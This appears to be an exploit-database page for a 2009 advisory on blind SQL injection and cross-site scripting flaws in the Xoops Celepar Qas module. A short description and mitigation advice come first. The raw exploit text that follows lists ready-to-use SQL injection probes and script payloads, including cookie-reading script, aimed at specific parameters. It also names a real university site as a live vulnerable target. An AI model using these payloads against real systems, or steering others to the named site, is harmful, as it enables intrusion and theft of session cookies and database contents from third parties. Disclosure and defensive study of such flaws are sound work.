header-logo
Suggest Exploit
vendor:
Celepar Module Qas
by:
Moudi
8,8
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Celepar Module Qas
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Xoops Celepar Module Qas (bSQL/XSS) Multiple Remote Vulnerabilities

A Blind SQL Injection vulnerability exists in Xoops Celepar Module Qas, which allows an attacker to execute arbitrary SQL commands on the vulnerable system. This vulnerability is due to the improper sanitization of user-supplied input in the 'cod_categoria' and 'codigo' parameters of the 'categoria.php', 'imprimir.php' and 'aviso.php' scripts. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable server. Successful exploitation of this vulnerability can result in unauthorized access to sensitive information stored in the database, as well as the execution of arbitrary SQL commands on the vulnerable system.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL commands. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
        [»] Xoops Celepar Module Qas (bSQL/XSS) Multiple Remote Vulnerabilities
==============================================================================

	[»] Script:             [ Xoops Celepar Module Qas ]
	[»] Language:           [ PHP ]
        [»] Download:           [ http://www.xoops.pr.gov.br/uploads/core/xoopscelepar.tar.gz  ]
	[»] Founder:            [ Moudi <m0udi@9.cn> ]
        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [»] Team:               [ EvilWay ]
        [»] Dork:               [ OFF ]
        [»] Price:              [ FREE ]
        [»] Site :              [ https://security-shell.ws/forum.php ]

###########################################################################

===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===	
	
[»] http://www.site.com/patch/categoria.php?cod_categoria=[BLIND]
[»] http://www.site.com/patch/imprimir.php?codigo=[BLIND]
[»] http://www.site.com/patch/aviso.php?codigo=[BLIND]

[»] http://www.dce.uem.br/modules/qas/categoria.php?cod_categoria=1 and 1=1 <= TRUE
[»] http://www.dce.uem.br/modules/qas/categoria.php?cod_categoria=1 and 1=2 <= FALSE

[»] http://www.dce.uem.br/modules/qas/imprimir.php?codigo=1 and 1=1 <= TRUE
[»] http://www.dce.uem.br/modules/qas/imprimir.php?codigo=1 and 1=2 <= FALSE

[»] http://www.dce.uem.br/modules/qas/aviso.php?codigo=1 and 1=1 <= TRUE
[»] http://www.dce.uem.br/modules/qas/aviso.php?codigo=1 and 1=2 <= FALSE

===[ Exploit XSS + LIVE : vulnerability ]===

[»] http://www.site.com/patch/categoria.php?cod_categoria=[XSS]
[»] http://www.site.com/patch/index.php?opcao=[XSS]
[»] http://www.site.com/patch/categoria.php/[XSS]
[»] http://www.site.com/patch/index.php/[XSS]

[»] http://www.dce.uem.br/modules/qas/categoria.php?cod_categoria="><script>alert(document.cookie);</script>
[»] http://www.dce.uem.br/modules/qas/index.php?opcao=1>'><ScRiPt %0A%0D>alert(439286918587)%3B</ScRiPt>
[»] http://www.dce.uem.br/modules/qas/categoria.php/>'><ScRiPt>alert(665068655391)</ScRiPt>
[»] http://www.dce.uem.br/modules/qas/index.php/>'><ScRiPt>alert(657988605523)</ScRiPt>

Author: Moudi

###########################################################################

# milw0rm.com [2009-07-27]

Navigation

Suggest Exploit

Services By CQR